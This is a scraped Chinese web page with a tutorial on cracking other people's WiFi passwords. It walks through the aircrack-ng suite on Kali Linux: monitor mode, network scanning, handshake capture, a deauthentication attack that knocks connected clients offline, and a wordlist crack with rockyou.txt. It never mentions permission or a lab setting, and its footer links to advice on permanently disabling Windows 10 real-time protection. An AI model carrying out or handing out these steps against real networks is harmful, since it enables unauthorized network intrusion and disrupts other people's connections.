破解WIFI详细教程 |
您所在的位置:网站首页 › 电脑强行破解wi-fi密码教程 › 破解WIFI详细教程 |
今日主题:如何破解WIFI准备工具 •笔记本一台 •usb无线网卡【我用的是小米的】 •kali系统【可以在虚拟机里装,建议用2019年及以下版本】 VMware Workstation15虚拟机安装可以参考https://www.jianshu.com/p/552179808ebf kali安装可以参考https://www.cnblogs.com/changjue/p/11244585.html WIFI加密方式1. WEP(有线等效加密)——采用WEP64位或者128位数据加密。 2.WPA-PSK[TKIP]———采用预共享秘钥的WI-FI保护访问,采用WPA-PSK标准加密技术,加密类型为TKIP。 3.WPA-PSK[TKIP]+WPA2-PSK[AES]———允许客户端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。 一打开虚拟机,插入usb网卡,把网卡放到虚拟机来 桌面右键,选择Open in Terminal打开终端 二显示网卡信息 airmon-ng 开启网卡监控 airmon-ng start wlan0 用ifconfig命令查看一下网卡信息 ifconfig 可以看到网卡的名字已经变了 三扫描WIFI信号 airodump-ng wlan0mon 拿到握手包 airodump-ng -w freedom -c 11 -–bssid 44:97:5A:F2:9E:B0 wlan0mon --ignore-negative-one 解释: -c:指定信道[ch] -w:指定抓去握手包的存放位置或者名字,freedom是一会抓去的握手包的名字 --bssid:指定路由器的MAC 再开一个终端输入命令 aireplay-ng -0 10 -a 路由器MAC -c 客户机MAC wlan0mon – -ignore-negative-one 使用airplay-ng工具强制断开已经连接到wifi的设备重新连接路由器,来进行抓去数据包 解释: -0:指定发送反认证包的个数(阿利伯数字0) -a:指定路由器的MAC -c:指定客户机的MAC 出现下图就是抓取成功 破解握手包 aircrack-ng -w dict freedom-*.cap dict:字典的名字 freedom-*.cap:握手包 破解成功 补充•系统自带了密码字典,我用的是我自己的 字典位置如下: /usr/share/john/password.lst /usr/share/wfuzz/wordlist /usr/share/ wordlists/rockyou.txt 最后一个路径下的文件默认是压缩的,可以通过以下命令解压 •反向认证的原理是让其中一个客户端下线,然后他再次连接,就可以获取握手包•信号扫描结束或者进程终止:ctrl+c 关注gzh:鹏哥的世界,回复:kali 获取资源 |
今日新闻 |
点击排行 |
|
推荐新闻 |
图片新闻 |
|
专题文章 |
CopyRight 2018-2019 实验室设备网 版权所有 win10的实时保护怎么永久关闭 |